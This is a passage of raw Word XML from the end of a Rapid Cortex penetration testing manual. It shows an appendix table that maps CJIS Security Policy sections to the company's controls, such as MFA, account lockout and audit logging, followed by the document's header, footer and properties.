        </w:rPr>
        <w:t xml:space="preserve">Appendix C — CJIS Security Policy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3240"/>
        <w:gridCol w:w="5760"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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Section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rapid Cortex Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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5.10</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Security Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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Annual pen test by qualified firm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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5.10.1</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Periodic security assessments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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Quarterly automated + annual manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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5.10.1.1</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Penetration testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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This manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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5.4.1</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Access enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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RBAC per Role Access Matrix v2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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5.4.3</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Unsuccessful login attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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Cognito account lockout after 5 failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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5.5.6</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Session lock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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15-minute timeout on dispatcher console</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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5.6</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Identification and authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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Cognito + MFA for all RC platform roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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5.8</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Audit and accountability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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CloudTrail + DynamoDB audit tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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5.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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Configuration management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="F8F7FE"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SAM/CloudFormation IaC, no manual changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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5.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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Incident response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC Incident Response Playbook (RC-SEC-IRP-001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9B91BB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">— End of Document —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="9B91BB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">RC-SEC-PENTEST-001 v1.0  |  Rapid Cortex  |  Confidential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DDF0" w:sz="2"/>
      </w:pBdr>
      <w:spacing w:before="80"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="9B91BB"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="9B91BB"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="9B91BB"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="9B91BB"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">NUMPAGES</w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="9B91BB"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">  |  Apps on Demand LLC d/b/a Rapid Cortex  |  Internal Use Only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none"/>
        <w:left w:val="none"/>
        <w:bottom w:val="single" w:color="7C3AED" w:sz="2"/>
        <w:right w:val="none"/>
        <w:insideH w:val="single" w:color="auto" w:sz="4"/>
        <w:insideV w:val="single" w:color="auto" w:sz="4"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="6480"/>
      <w:gridCol w:w="3600"/>
    </w:tblGrid>
    <w:tr>
      <w:tc>
        <w:p>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="7C3AED"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:t xml:space="preserve">RAPID CORTEX</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              <w:color w:val="9B91BB"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:t xml:space="preserve">  |  Penetration Testing Manual  |  RC-SEC-PENTEST-001</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:p>
          <w:pPr>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="EF4444"/>
              <w:sz w:val="14"/>
              <w:szCs w:val="14"/>
            </w:rPr>
            <w:t xml:space="preserve">CONFIDENTIAL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RC Penetration Testing Manual</dc:title>
  <dc:creator>Rapid Cortex Security Engineering</dc:creator>
  <dc:description>Rapid Cortex Penetration Testing Manual RC-SEC-PENTEST-001</dc:description>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-06T18:53:14.068Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-06T18:53:14.083Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>